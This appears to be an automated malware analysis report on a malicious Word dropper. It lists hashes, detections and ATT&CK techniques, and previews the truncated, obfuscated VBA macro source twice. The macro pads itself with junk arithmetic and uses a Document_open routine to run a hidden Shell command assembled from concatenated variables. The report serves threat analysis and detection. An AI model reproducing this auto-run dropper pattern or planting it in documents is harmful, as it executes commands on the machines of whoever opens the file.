Office (OLE) malware analysis — malicious · b2fae0f252bdeaf3

MALICIOUS

Office (OLE)

244.0 KB Created: 2018-07-20 07:26:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: dc251d4f51b272cdde77cc65944b2fd0 SHA-1: e918129a99c4e16b393098178b505cf857f04de3 SHA-256: b2fae0f252bdeaf36edc641de33455ae4d1591fa2998decd27879b7405f8b173

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is identified as malicious by ClamAV and contains VBA macros. A critical heuristic firing indicates the presence of a Shell() call within the VBA code, suggesting the execution of external commands. This is commonly used to download and run additional malicious payloads.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6616612-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6616612-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 53046 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	53046 bytes
SHA-256: `6692cda462aaa2738ce8e1f25d3270e4638314eb60e93b4c94214736b5bc0c6e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "LjRpninnAwGiIj" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function SvlwRVJiLq() On Error Resume Next GjYccm = (96880 - ZtiGLf / hLFoX - uCjar - (68923 + wKLKQ + BDzfr / QUWlDn)) QrwYa = (14253 - ViVhq / CppGcU - WzEzSG - (66205 + iqiBU + OwSjTq / wqzNuw)) AtnLzm = (46884 - ioCkC / zPhYqC - OijOEH - (10020 + QfmGF + EWALi / pYKdGh)) UXiWhh = (35885 - BFUYLm / qjWVnt - ZJdwa - (13885 + jXITW + Svimu / JRbzRo)) HEfzi = (99856 - LGwuiT / OIPizp - sjNLRo - (80294 + DIXlj + LAoYF / sQDQz)) End Function Private Function wIXhGnoCjoX() On Error Resume Next GWclNO = (30328 - JWpLt / LlwdfU - zGXCv - (29471 + AIFoV + vaiWzw / jDZwnt)) TQFLNt = (86404 - clBuA / bzGPRK - BLzkiC - (71274 + PHhwnV + dwCBjN / TsjaHC)) fwQjjC = (1305 - HKFHUA / UvvrJY - bUWrvJ - (89648 + stELzK + aTVXo / zSZlnv)) pMRwRF = (10250 - jqHiMi / vNcvW - MQilL - (84981 + ADviz + RVhqE / XXTKYi)) qPCQz = (27056 - QEjSz / QBRBq - wkHcih - (67424 + vhaPCF + KtCYVj / KZnhzZ)) tjIZAX = (92516 - rHrsV / MCJBi - UcWlj - (78975 + BzGINM + zNwlw / ERbNjv)) HvwzL = (39351 - nYiQfL / iUQtNF - PdULK - (50643 + oziJPu + fSEtd / FdpEEd)) End Function Private Function oNfHTpcvnL() On Error Resume Next FAHzj = (62267 - QcAaJZ / GdpWKt - PqGXvD - (27584 + IGGAj + IiDZH / GiimL)) wwPqiI = (81527 - oPqdiH / NDMZrf - cGMWRK - (76915 + XsEDz + sVqrA / fnRFuz)) wafvZ = (63347 - MwNXXU / ltFFCh - iMqQa - (58152 + pZuizN + wnPwB / cZapHn)) DEINp = (11500 - pJAZn / hJTtUI - LwzmzD - (61389 + kIULsh + CAtRv / jzddl)) iqhJX = (18787 - OpfwC / WZTsY - YoGqG - (453 + bIlAIn + XHiMV / DKhzjA)) zLoSDK = (18178 - FVPla / EAfOuv - HSACN - (64569 + wVILZA + ZTCHiY / widfU)) End Function Private Sub Document_open() On Error Resume Next zStrL = (93485 - roCUPv / avNPG - mKtcJm - (75193 + oLtOsG + ELtoKX / TKaCUS)) MHYbj = (74877 - RiYJo / dJGXo - WkUbw - (38961 + qiCGS + ccwlp / XIfuK)) MIAMp = (60831 - KMWwKd / YNGIm - UhVivI - (61724 + SciaY + EzRpB / aAiPs)) fBZFU = (27826 - linRQ / zisjnV - LwawRH - (53443 + TzGqF + AzsXO / AjZKz)) Shell "" + XpATffIzbsfc + wqObFoMbfX + CVar("c") + RBqpJLul + hianMdA + jjXAVw + GVNPKra + najLwBrK + ZtzGmqUjd + pwnAdOh + CFaRqrZnSwl + msGjo + kzVAqBbPmDz + jNHpi + wwIbNjUzB + iqvojz + wbNzF + wJMRlwtjA + AZbjsQf + btdDBFmzbc + AYWBFzTTbuY + GrSRazRJszB + PIfTkFR + wcvSuwTcE + qUzWlmPS + qJMvr + lICGVfSIqT + IqUtqSm + rIwbXDsh + nMmPRfjbKdz, 0 LYJlfY = (31111 - smRQLA / TCKTYP - BZlPud - (47227 + rLIIn + NRNIK / vaVwFi)) End Sub Private Function CiwtsuRXMvNpsI() On Error Resume Next ZoUVR = (25877 - qIRcXj / EjGSM - fKJiO - (68219 + LAzfT + LfzvR / bYfvzp)) pksKo = (9472 - LhXia / tCTun - urzlzq - (75075 + OzJXsB + LAhRKz / nMVLq)) nRRhi = (94044 - lPflH / naqKlJ - YsGop - (68440 + pzOMtK + lujQAW / aPSJJ)) suuFR = (23219 - qztTBZ / NYApZ - hBldct - (54058 + mPnAo + WDORb / LVBozJ)) End Function Private Function SfLkbWjA() On Error Resume Next PjbBV = (77438 - ZOzsT / PKunSN - HdJdS - (14994 + bbiow + kiTmi / XqwKnF)) dwPzW = (81761 - aPUiUk / Rjzquo - aILwOL - (91121 + oPuSi + zCEtB / icXfj)) mYivFH = (6183 - bFlzK / jpbDm - PbQGY - (61732 + YLjdQz + YHQiQq / RbCWU)) wrYDm = (6816 - DnEDH / EWbEoC - bTdtz - (87302 + OzlfMP + wLPMHO / DJwBl)) ACFGpd = (41268 - mWzjN / hzjIv - OhrHE - (69154 + UJTWYj + PYWYz / tUwwp)) AmvfOG = (27338 - HXWZK / CubUzj - bYznvH - (96608 + NkDLz + YlzCr / NztIq)) wIBai = (19443 - iTLwCF / AFSAZA - IIaKJb - (20619 + kuSEPr + IsrND / wNXWth)) End Function Private Function plMjChuLdsvLTl() On Error Resume Next RTZDjm = (91055 - zAwkvL / tlltMm - dvWIau - (89155 + HvSZBa + WcVOPw / QHkab)) szDCj = (13713 - kmowdn / fiwsKd - NHwrjG - (45153 + LtoOz + MzlQi / ctOiRX)) hnHLop = (58024 - aLAiMs / RVJWF - JYwWf - (22648 + OYATzw + ILONk / qBJN ... (truncated)

SHA-256: 6692cda462aaa2738ce8e1f25d3270e4638314eb60e93b4c94214736b5bc0c6e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "LjRpninnAwGiIj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function SvlwRVJiLq()
On Error Resume Next
   GjYccm = (96880 - ZtiGLf / hLFoX - uCjar - (68923 + wKLKQ + BDzfr / QUWlDn))
   QrwYa = (14253 - ViVhq / CppGcU - WzEzSG - (66205 + iqiBU + OwSjTq / wqzNuw))
   AtnLzm = (46884 - ioCkC / zPhYqC - OijOEH - (10020 + QfmGF + EWALi / pYKdGh))
   UXiWhh = (35885 - BFUYLm / qjWVnt - ZJdwa - (13885 + jXITW + Svimu / JRbzRo))
   HEfzi = (99856 - LGwuiT / OIPizp - sjNLRo - (80294 + DIXlj + LAoYF / sQDQz))
End Function
Private Function wIXhGnoCjoX()
On Error Resume Next
   GWclNO = (30328 - JWpLt / LlwdfU - zGXCv - (29471 + AIFoV + vaiWzw / jDZwnt))
   TQFLNt = (86404 - clBuA / bzGPRK - BLzkiC - (71274 + PHhwnV + dwCBjN / TsjaHC))
   fwQjjC = (1305 - HKFHUA / UvvrJY - bUWrvJ - (89648 + stELzK + aTVXo / zSZlnv))
   pMRwRF = (10250 - jqHiMi / vNcvW - MQilL - (84981 + ADviz + RVhqE / XXTKYi))
   qPCQz = (27056 - QEjSz / QBRBq - wkHcih - (67424 + vhaPCF + KtCYVj / KZnhzZ))
   tjIZAX = (92516 - rHrsV / MCJBi - UcWlj - (78975 + BzGINM + zNwlw / ERbNjv))
   HvwzL = (39351 - nYiQfL / iUQtNF - PdULK - (50643 + oziJPu + fSEtd / FdpEEd))
End Function
Private Function oNfHTpcvnL()
On Error Resume Next
   FAHzj = (62267 - QcAaJZ / GdpWKt - PqGXvD - (27584 + IGGAj + IiDZH / GiimL))
   wwPqiI = (81527 - oPqdiH / NDMZrf - cGMWRK - (76915 + XsEDz + sVqrA / fnRFuz))
   wafvZ = (63347 - MwNXXU / ltFFCh - iMqQa - (58152 + pZuizN + wnPwB / cZapHn))
   DEINp = (11500 - pJAZn / hJTtUI - LwzmzD - (61389 + kIULsh + CAtRv / jzddl))
   iqhJX = (18787 - OpfwC / WZTsY - YoGqG - (453 + bIlAIn + XHiMV / DKhzjA))
   zLoSDK = (18178 - FVPla / EAfOuv - HSACN - (64569 + wVILZA + ZTCHiY / widfU))
End Function
Private Sub Document_open()
On Error Resume Next
   zStrL = (93485 - roCUPv / avNPG - mKtcJm - (75193 + oLtOsG + ELtoKX / TKaCUS))
   MHYbj = (74877 - RiYJo / dJGXo - WkUbw - (38961 + qiCGS + ccwlp / XIfuK))
   MIAMp = (60831 - KMWwKd / YNGIm - UhVivI - (61724 + SciaY + EzRpB / aAiPs))
   fBZFU = (27826 - linRQ / zisjnV - LwawRH - (53443 + TzGqF + AzsXO / AjZKz))
Shell "" + XpATffIzbsfc + wqObFoMbfX + CVar("c") + RBqpJLul + hianMdA + jjXAVw + GVNPKra + najLwBrK + ZtzGmqUjd + pwnAdOh + CFaRqrZnSwl + msGjo + kzVAqBbPmDz + jNHpi + wwIbNjUzB + iqvojz + wbNzF + wJMRlwtjA + AZbjsQf + btdDBFmzbc + AYWBFzTTbuY + GrSRazRJszB + PIfTkFR + wcvSuwTcE + qUzWlmPS + qJMvr + lICGVfSIqT + IqUtqSm + rIwbXDsh + nMmPRfjbKdz, 0
   LYJlfY = (31111 - smRQLA / TCKTYP - BZlPud - (47227 + rLIIn + NRNIK / vaVwFi))
End Sub
Private Function CiwtsuRXMvNpsI()
On Error Resume Next
   ZoUVR = (25877 - qIRcXj / EjGSM - fKJiO - (68219 + LAzfT + LfzvR / bYfvzp))
   pksKo = (9472 - LhXia / tCTun - urzlzq - (75075 + OzJXsB + LAhRKz / nMVLq))
   nRRhi = (94044 - lPflH / naqKlJ - YsGop - (68440 + pzOMtK + lujQAW / aPSJJ))
   suuFR = (23219 - qztTBZ / NYApZ - hBldct - (54058 + mPnAo + WDORb / LVBozJ))
End Function
Private Function SfLkbWjA()
On Error Resume Next
   PjbBV = (77438 - ZOzsT / PKunSN - HdJdS - (14994 + bbiow + kiTmi / XqwKnF))
   dwPzW = (81761 - aPUiUk / Rjzquo - aILwOL - (91121 + oPuSi + zCEtB / icXfj))
   mYivFH = (6183 - bFlzK / jpbDm - PbQGY - (61732 + YLjdQz + YHQiQq / RbCWU))
   wrYDm = (6816 - DnEDH / EWbEoC - bTdtz - (87302 + OzlfMP + wLPMHO / DJwBl))
   ACFGpd = (41268 - mWzjN / hzjIv - OhrHE - (69154 + UJTWYj + PYWYz / tUwwp))
   AmvfOG = (27338 - HXWZK / CubUzj - bYznvH - (96608 + NkDLz + YlzCr / NztIq))
   wIBai = (19443 - iTLwCF / AFSAZA - IIaKJb - (20619 + kuSEPr + IsrND / wNXWth))
End Function
Private Function plMjChuLdsvLTl()
On Error Resume Next
   RTZDjm = (91055 - zAwkvL / tlltMm - dvWIau - (89155 + HvSZBa + WcVOPw / QHkab))
   szDCj = (13713 - kmowdn / fiwsKd - NHwrjG - (45153 + LtoOz + MzlQi / ctOiRX))
   hnHLop = (58024 - aLAiMs / RVJWF - JYwWf - (22648 + OYATzw + ILONk / qBJN
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.